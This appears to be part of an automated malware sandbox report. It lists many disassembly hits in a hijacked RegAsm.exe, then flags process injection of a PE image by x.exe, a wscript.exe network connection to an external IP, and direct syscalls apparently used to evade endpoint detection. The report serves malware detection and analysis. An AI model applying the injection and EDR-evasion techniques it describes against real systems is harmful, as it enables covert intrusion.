                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A6C7 mov ebx, dword ptr fs:[00000030h]5_2_02B5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A6C7 mov eax, dword ptr fs:[00000030h]5_2_02B5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF6C7 mov eax, dword ptr fs:[00000030h]5_2_02BDF6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B516CF mov eax, dword ptr fs:[00000030h]5_2_02B516CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5636 mov eax, dword ptr fs:[00000030h]5_2_02BF5636
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E627 mov eax, dword ptr fs:[00000030h]5_2_02B3E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B56620 mov eax, dword ptr fs:[00000030h]5_2_02B56620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B58620 mov eax, dword ptr fs:[00000030h]5_2_02B58620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]5_2_02B1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2262C mov eax, dword ptr fs:[00000030h]5_2_02B2262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B23616 mov eax, dword ptr fs:[00000030h]5_2_02B23616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B23616 mov eax, dword ptr fs:[00000030h]5_2_02B23616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62619 mov eax, dword ptr fs:[00000030h]5_2_02B62619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E609 mov eax, dword ptr fs:[00000030h]5_2_02B9E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B51607 mov eax, dword ptr fs:[00000030h]5_2_02B51607
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5F603 mov eax, dword ptr fs:[00000030h]5_2_02B5F603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]5_2_02B3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B52674 mov eax, dword ptr fs:[00000030h]5_2_02B52674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE866E mov eax, dword ptr fs:[00000030h]5_2_02BE866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE866E mov eax, dword ptr fs:[00000030h]5_2_02BE866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A660 mov eax, dword ptr fs:[00000030h]5_2_02B5A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A660 mov eax, dword ptr fs:[00000030h]5_2_02B5A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B59660 mov eax, dword ptr fs:[00000030h]5_2_02B59660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B59660 mov eax, dword ptr fs:[00000030h]5_2_02B59660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3C640 mov eax, dword ptr fs:[00000030h]5_2_02B3C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D7B0 mov eax, dword ptr fs:[00000030h]5_2_02B4D7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF37B6 mov eax, dword ptr fs:[00000030h]5_2_02BF37B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]5_2_02B1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA97A9 mov eax, dword ptr fs:[00000030h]5_2_02BA97A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]5_2_02BAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]5_2_02BAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]5_2_02BAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]5_2_02BAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]5_2_02BAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B207AF mov eax, dword ptr fs:[00000030h]5_2_02B207AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF78A mov eax, dword ptr fs:[00000030h]5_2_02BDF78A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B247FB mov eax, dword ptr fs:[00000030h]5_2_02B247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B247FB mov eax, dword ptr fs:[00000030h]5_2_02B247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2D7E0 mov ecx, dword ptr fs:[00000030h]5_2_02B2D7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B427ED mov eax, dword ptr fs:[00000030h]5_2_02B427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B427ED mov eax, dword ptr fs:[00000030h]5_2_02B427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B427ED mov eax, dword ptr fs:[00000030h]5_2_02B427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2C7C0 mov eax, dword ptr fs:[00000030h]5_2_02B2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B257C0 mov eax, dword ptr fs:[00000030h]5_2_02B257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B257C0 mov eax, dword ptr fs:[00000030h]5_2_02B257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B257C0 mov eax, dword ptr fs:[00000030h]5_2_02B257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA07C3 mov eax, dword ptr fs:[00000030h]5_2_02BA07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19730 mov eax, dword ptr fs:[00000030h]5_2_02B19730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19730 mov eax, dword ptr fs:[00000030h]5_2_02B19730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B55734 mov eax, dword ptr fs:[00000030h]5_2_02B55734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFB73C mov eax, dword ptr fs:[00000030h]5_2_02BFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFB73C mov eax, dword ptr fs:[00000030h]5_2_02BFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFB73C mov eax, dword ptr fs:[00000030h]5_2_02BFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFB73C mov eax, dword ptr fs:[00000030h]5_2_02BFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2973A mov eax, dword ptr fs:[00000030h]5_2_02B2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2973A mov eax, dword ptr fs:[00000030h]5_2_02B2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5273C mov eax, dword ptr fs:[00000030h]5_2_02B5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5273C mov ecx, dword ptr fs:[00000030h]5_2_02B5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5273C mov eax, dword ptr fs:[00000030h]5_2_02B5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9C730 mov eax, dword ptr fs:[00000030h]5_2_02B9C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B23720 mov eax, dword ptr fs:[00000030h]5_2_02B23720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3F720 mov eax, dword ptr fs:[00000030h]5_2_02B3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3F720 mov eax, dword ptr fs:[00000030h]5_2_02B3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3F720 mov eax, dword ptr fs:[00000030h]5_2_02B3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF72E mov eax, dword ptr fs:[00000030h]5_2_02BDF72E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5C720 mov eax, dword ptr fs:[00000030h]5_2_02B5C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5C720 mov eax, dword ptr fs:[00000030h]5_2_02B5C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE972B mov eax, dword ptr fs:[00000030h]5_2_02BE972B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B20710 mov eax, dword ptr fs:[00000030h]5_2_02B20710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B50710 mov eax, dword ptr fs:[00000030h]5_2_02B50710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5F71F mov eax, dword ptr fs:[00000030h]5_2_02B5F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5F71F mov eax, dword ptr fs:[00000030h]5_2_02B5F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B25702 mov eax, dword ptr fs:[00000030h]5_2_02B25702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B25702 mov eax, dword ptr fs:[00000030h]5_2_02B25702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27703 mov eax, dword ptr fs:[00000030h]5_2_02B27703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5C700 mov eax, dword ptr fs:[00000030h]5_2_02B5C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B28770 mov eax, dword ptr fs:[00000030h]5_2_02B28770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]5_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B765 mov eax, dword ptr fs:[00000030h]5_2_02B1B765
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 196.251.92.64 80Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
